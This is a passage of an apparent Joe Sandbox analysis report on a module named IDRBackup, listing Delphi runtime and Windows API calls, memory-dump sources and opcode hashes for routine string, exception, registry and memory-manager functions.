                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000001,?,00000000,500307EF), ref: 500307CA
                                                                                                    • Part of subcall function 500265E8: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265F7
                                                                                                    • Part of subcall function 500265E8: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 5002661C
                                                                                                    • Part of subcall function 500265E8: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 50026627
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,500307EF), ref: 500307CF
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$StringStringx20$Asg$qqrr20$Cat3$qqrr20LoadRaiseRecxiStringpx14Stringt2Sysutils@Text$qqrxusTypeVariants@$CharClassClassoCreate$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFormat$qqrx20FromInstance$qqruiLen$qqrr20List$qqrvMetaResourceString$qqrp20Stringpbi
                                                                                                  • String ID:
                                                                                                  • API String ID: 2913030950-0
                                                                                                  APIs
                                                                                                  • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030933), ref: 500308CE
                                                                                                    • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391E7
                                                                                                    • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 50039290
                                                                                                    • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500392A3
                                                                                                  • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030933), ref: 500308E2
                                                                                                    • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391FF
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000001,?,00000000,50030933), ref: 500308FF
                                                                                                    • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                    • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                    • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000001,?,00000000,50030933), ref: 5003090E
                                                                                                    • Part of subcall function 500265E8: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265F7
                                                                                                    • Part of subcall function 500265E8: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 5002661C
                                                                                                    • Part of subcall function 500265E8: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 50026627
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50030933), ref: 50030913
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$StringStringx20$Asg$qqrr20$Cat3$qqrr20LoadRaiseRecxiStringpx14Stringt2Sysutils@Text$qqrxusTypeVariants@$CharClassClassoCreate$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFormat$qqrx20FromInstance$qqruiLen$qqrr20List$qqrvMetaResourceString$qqrp20Stringpbi
                                                                                                  • String ID:
                                                                                                  • API String ID: 2913030950-0
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(00000000), ref: 5000264B
                                                                                                  • Sleep.KERNEL32(0000000A,00000000), ref: 50002661
                                                                                                  • Sleep.KERNEL32(00000000), ref: 5000268F
                                                                                                  • Sleep.KERNEL32(0000000A,00000000), ref: 500026A5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 3472027048-0
                                                                                                  APIs
                                                                                                  • @Character@TCharacter@IsHighSurrogate$qqrb.RTL120 ref: 50010538
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120 ref: 50010553
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120 ref: 5001054E
                                                                                                    • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                    • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                    • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                  • @Character@TCharacter@IsLowSurrogate$qqrb.RTL120 ref: 5001055A
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120 ref: 50010570
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120 ref: 50010575
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$Character@$RaiseString$Except$qqrvException@$bctr$qqrp20Surrogate$qqrbSysutils@$AfterClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucHighList$qqrvLoadMetaObjectString$qqrp20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2248103522-0
                                                                                                  APIs
                                                                                                  • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D299
                                                                                                  • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2AB
                                                                                                  • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2BD
                                                                                                  • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2CF
                                                                                                  • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2E1
                                                                                                  • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2F3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Free$qqrvObject@System@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1799115918-0
                                                                                                  APIs
                                                                                                  • @Math@LnXP1$qqrxg.RTL120(?,?,?), ref: 50014737
                                                                                                  • @System@Ln$qqrxg.RTL120 ref: 500147D3
                                                                                                  • @System@Exp$qqrxg.RTL120 ref: 50014826
                                                                                                  • @System@Exp$qqrxg.RTL120(?,?,?), ref: 50014760
                                                                                                    • Part of subcall function 500123E4: @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(?,500145C0), ref: 500123F0
                                                                                                    • Part of subcall function 500123E4: @System@@RaiseExcept$qqrv.RTL120(?,500145C0), ref: 500123F5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Exp$qqrxg$Except$qqrvException@$bctr$qqrx20Ln$qqrxgMath@P1$qqrxgRaiseStringSystem@@Sysutils@Unicode
                                                                                                  • String ID: InternalRateOfReturn
                                                                                                  • API String ID: 309294142-2879142521
                                                                                                  • Opcode ID: 40dbb84fc3f4aabbfd560051f9dc9f7ee145eef59bad3b00fae40bf970de2026
                                                                                                  • Instruction ID: b61e661a85086c600ac26f88c2d9d293700b97cdbe0b4422f277c6d0116d9991
                                                                                                  • Opcode Fuzzy Hash: 40dbb84fc3f4aabbfd560051f9dc9f7ee145eef59bad3b00fae40bf970de2026
                                                                                                  • Instruction Fuzzy Hash: 69410960E091DA66CF516FF5DC504EEBFB4FF06900F104B5BE8E4A3162DA3289A0CB80
                                                                                                  APIs
                                                                                                  • @Sysutils@StrCharLength$qqrpxb.RTL120(?), ref: 500239DB
                                                                                                  • @Sysutils@StrNextChar$qqrpxb.RTL120 ref: 500239F5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sysutils@$CharChar$qqrpxbLength$qqrpxbNext
                                                                                                  • String ID: H
                                                                                                  • API String ID: 4247032953-2852464175
                                                                                                  • Opcode ID: d4cd2c9e9290bb1fd43fec2215baa18dbef9c92e5702672488c2aa5db4bf2880
                                                                                                  • Instruction ID: e4e35325c6f34d9b65b87c66d780d8f477e977d8e87dd0103a07f57f46b7daee
                                                                                                  • Opcode Fuzzy Hash: d4cd2c9e9290bb1fd43fec2215baa18dbef9c92e5702672488c2aa5db4bf2880
                                                                                                  • Instruction Fuzzy Hash: 0731A53091658A8BDB10DFA8E8557EEB7F4EF05310F144226E844A76A2D3749E84C7A6
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 500069D6
                                                                                                  • RegQueryValueExW.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,50006A25,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 50006A09
                                                                                                  • RegCloseKey.ADVAPI32(?,50006A2C,00000000,?,00000004,00000000,50006A25,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 50006A1F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                  • API String ID: 3677997916-4173385793
                                                                                                  • Opcode ID: 9ee370e70f06ee6609448c8435f7d602838b41d496a2b7e5916629935dfd1a17
                                                                                                  • Instruction ID: 68fb37e24ddefeba98026e83a54610ce6f8a69bb8d0a75ef775160f2897bda80
                                                                                                  • Opcode Fuzzy Hash: 9ee370e70f06ee6609448c8435f7d602838b41d496a2b7e5916629935dfd1a17
                                                                                                  • Instruction Fuzzy Hash: 5A01F579A50248BAF710DBE19C62FF977ECEB09720F504666FA04E3580E6349900CA55
                                                                                                  APIs
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 500117F5
                                                                                                  • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 50011807
                                                                                                    • Part of subcall function 5001062C: FindResourceW.KERNEL32(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010640
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5001064B
                                                                                                    • Part of subcall function 5001062C: LoadResource.KERNEL32(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010657
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010662
                                                                                                    • Part of subcall function 5001062C: LockResource.KERNEL32(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010668
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010674
                                                                                                  • @Character@TCharacter@IsAscii$qqrb.RTL120 ref: 50011849
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Character@$Error$qqrvLastRaiseResourceSysutils@$Ascii$qqrbFindInitialize$qqrvLatin1$qqrbLoadLock
                                                                                                  • String ID: A$Z
                                                                                                  • API String ID: 2801340237-4098844585
                                                                                                  • Opcode ID: 3d7b16622b306a41cb389fb1ff8cb04a695359a54526d75529cb678f32deca9d
                                                                                                  • Instruction ID: 8de0f1dd0d009ed91e586fc1ea9b6193379de2375c44f7f3be455893678d8cca
                                                                                                  • Opcode Fuzzy Hash: 3d7b16622b306a41cb389fb1ff8cb04a695359a54526d75529cb678f32deca9d
                                                                                                  • Instruction Fuzzy Hash: 5701D651B181910BE71C5A619C513E833D26794302B5C827EE856CB6E3DF38C5D5E220
                                                                                                  APIs
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 50010A59
                                                                                                  • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 50010A6B
                                                                                                    • Part of subcall function 5001062C: FindResourceW.KERNEL32(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010640
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5001064B
                                                                                                    • Part of subcall function 5001062C: LoadResource.KERNEL32(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010657
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010662
                                                                                                    • Part of subcall function 5001062C: LockResource.KERNEL32(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010668
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010674
                                                                                                  • @Character@TCharacter@IsAscii$qqrb.RTL120 ref: 50010AAD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Character@$Error$qqrvLastRaiseResourceSysutils@$Ascii$qqrbFindInitialize$qqrvLatin1$qqrbLoadLock
                                                                                                  • String ID: a$z
                                                                                                  • API String ID: 2801340237-4151050625
                                                                                                  • Opcode ID: 68cc252f88e33736421a10eeeaa1cb58d10f880ea185927b8fcd1914d9384458
                                                                                                  • Instruction ID: 7fc53a10070eca12ef29afc55d4c6d512350c562e79b40b59943fefc8229aada
                                                                                                  • Opcode Fuzzy Hash: 68cc252f88e33736421a10eeeaa1cb58d10f880ea185927b8fcd1914d9384458
                                                                                                  • Instruction Fuzzy Hash: 3401F951B142D04BE7184B71AC512E937D2AB80302BC9417EF4C3CB697DBBD85D5E721
                                                                                                  APIs
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,00000000,?,500249A4,?,00000000,50024C6D), ref: 5002485E
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,?,?,00000000,?,500249A4,?,00000000,50024C6D), ref: 50024866
                                                                                                  • @Sysutils@AnsiStrPos$qqrpbt1.RTL120(?,?,?,00000000,?,500249A4,?,00000000,50024C6D), ref: 5002486C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Char$qqrx20StringSystem@System@@Unicode$AnsiPos$qqrpbt1Sysutils@
                                                                                                  • String ID: XlP$tlP
                                                                                                  • API String ID: 1532255607-7086264
                                                                                                  • Opcode ID: 991b3ea7feb4240ad0f450cbc532c132e9e449f5bec3a229383f214eb6be9b84
                                                                                                  • Instruction ID: 41cbf7802f78e1180780a1aded232e557ab5269dbb48a6fdf072be4a9a689297
                                                                                                  • Opcode Fuzzy Hash: 991b3ea7feb4240ad0f450cbc532c132e9e449f5bec3a229383f214eb6be9b84
                                                                                                  • Instruction Fuzzy Hash: ABF0A7A27161D69BE7509B68FC80B6E77E8DB55264F510A36EA88C7201DA35DC00C751
                                                                                                  APIs
                                                                                                  • MessageBoxA.USER32(00000000,50001F08,50001EE8,00002010), ref: 50003C85
                                                                                                    • Part of subcall function 50003BF0: OpenFileMappingA.KERNEL32(00000004,00000000,Local\FastMM_PID_????????), ref: 50003C00
                                                                                                  • @System@SetMemoryManager$qqrrx23System@TMemoryManagerEx.RTL120 ref: 50003C65
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MemorySystem@$FileManagerManager$qqrrx23MappingMessageOpen
                                                                                                  • String ID: <JP$jP
                                                                                                  • API String ID: 3588758399-1976356052
                                                                                                  • Opcode ID: 837f7ce824299e718ff31fc9975fec7b007778b051f42d7a6ff680c07298d06b
                                                                                                  • Instruction ID: 26df9d579ac72b310c812ec49e7277c3074fc2727e4b984d6bdc51d0e5f759bc
                                                                                                  • Opcode Fuzzy Hash: 837f7ce824299e718ff31fc9975fec7b007778b051f42d7a6ff680c07298d06b
                                                                                                  • Instruction Fuzzy Hash: 9CF082282045C0DAF676D7B0AC75F8923EC5724240FC14B17E905F7152D761C840ABA2
                                                                                                  APIs
                                                                                                    • Part of subcall function 50003BF0: OpenFileMappingA.KERNEL32(00000004,00000000,Local\FastMM_PID_????????), ref: 50003C00
                                                                                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000004,Local\FastMM_PID_????????), ref: 50003CBE
                                                                                                  • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000), ref: 50003CD6
                                                                                                  • UnmapViewOfFile.KERNEL32(00000000,?,00000002,00000000,00000000,00000000), ref: 50003CE2
                                                                                                  Strings
                                                                                                  • Local\FastMM_PID_????????, xrefs: 50003CAF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$MappingView$CreateOpenUnmap
                                                                                                  • String ID: Local\FastMM_PID_????????
                                                                                                  • API String ID: 2158777448-3568460072
                                                                                                  • Opcode ID: 812e1af7b6a7b700a59ef8b948a59b648fbb4594b905c5d210d35c39233bdc6a
                                                                                                  • Instruction ID: 9257d67356388e225cbde0ea26a55ef2e4a99ea564a19721fac7c5c684e59e6f
                                                                                                  • Opcode Fuzzy Hash: 812e1af7b6a7b700a59ef8b948a59b648fbb4594b905c5d210d35c39233bdc6a
                                                                                                  • Instruction Fuzzy Hash: 71F09BB064538075F6319BB06C63F8522A85721B54FA00723F720FF0D3D7F19440575A
                                                                                                  APIs
                                                                                                    • Part of subcall function 50003BBC: GetCurrentProcessId.KERNEL32(?,50003BF7,?,?,50003C61), ref: 50003BBD
                                                                                                  • OpenFileMappingA.KERNEL32(00000004,00000000,Local\FastMM_PID_????????), ref: 50003C00
                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,?,50003C61), ref: 50003C18
                                                                                                  • UnmapViewOfFile.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000,?,?,50003C61), ref: 50003C20
                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,50003C61), ref: 50003C26
                                                                                                  Strings
                                                                                                  • Local\FastMM_PID_????????, xrefs: 50003BF7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: File$View$CloseCurrentHandleMappingOpenProcessUnmap
                                                                                                  • String ID: Local\FastMM_PID_????????
                                                                                                  • API String ID: 3303930959-3568460072
                                                                                                  • Opcode ID: 7642a81f86c0cf429a4968a1d66b8e04bc81eebb4c9b12c163bbd6232915ee5e
                                                                                                  • Instruction ID: de9adb8942b47b404bea560d384b89a0808252958130f6c2296cf7b79e4161ec
                                                                                                  • Opcode Fuzzy Hash: 7642a81f86c0cf429a4968a1d66b8e04bc81eebb4c9b12c163bbd6232915ee5e
                                                                                                  • Instruction Fuzzy Hash: ABE0ECA17823A136F53172F02CA3F8A954C4F25A55F940B637700BA1C2DAE49C0012D8
                                                                                                  APIs
                                                                                                    • Part of subcall function 50025D50: @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?), ref: 50025D6C
                                                                                                    • Part of subcall function 50025D50: @System@LoadResString$qqrp20System@TResStringRec.RTL120 ref: 50025D7E
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50025E8E,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50025DD9
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50025E8E,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50025DFC
                                                                                                    • Part of subcall function 50009D40: @System@@NewUnicodeString$qqri.RTL120(00000000,?,50004742), ref: 50009D5B
                                                                                                    • Part of subcall function 50009D40: @System@Move$qqrpxvpvi.RTL120(00000000,?,50004742), ref: 50009D69
                                                                                                    • Part of subcall function 50009D40: @System@@FreeMem$qqrpv.RTL120(50004742), ref: 50009D8B
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50025E8E,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50025E42
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50025E8E,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50025E65
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$StringSystem@@$Asg$qqrr20Stringx20$FreeLoadLocaleMem$qqrpvMove$qqrpxvpviStr$qqriix20String$qqriString$qqrp20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 943917607-0
                                                                                                  • Opcode ID: d9635f307f6dee683a94e50e8087e5007a6a068d91809b74f37d2b4e69d84ff6
                                                                                                  • Instruction ID: da8087070b0f5265adf1fffc26e669f63a26a283c91abc2d06778dd38358d0ac
                                                                                                  • Opcode Fuzzy Hash: d9635f307f6dee683a94e50e8087e5007a6a068d91809b74f37d2b4e69d84ff6
                                                                                                  • Instruction Fuzzy Hash: 4D31C332A015496FDB04CA84E881AAF77AEEF88310FA14637F909E7251D635FD0187D8
                                                                                                  APIs
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A2FE
                                                                                                  • @System@@NewUnicodeString$qqri.RTL120 ref: 5000A30F
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,00000000), ref: 5000A357
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A365
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A37A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@System@@Unicode$Asg$qqrr20Clr$qqrpvLength$qqrr20Move$qqrpxvpviStringString$qqriStringiStringx20
                                                                                                  • String ID:
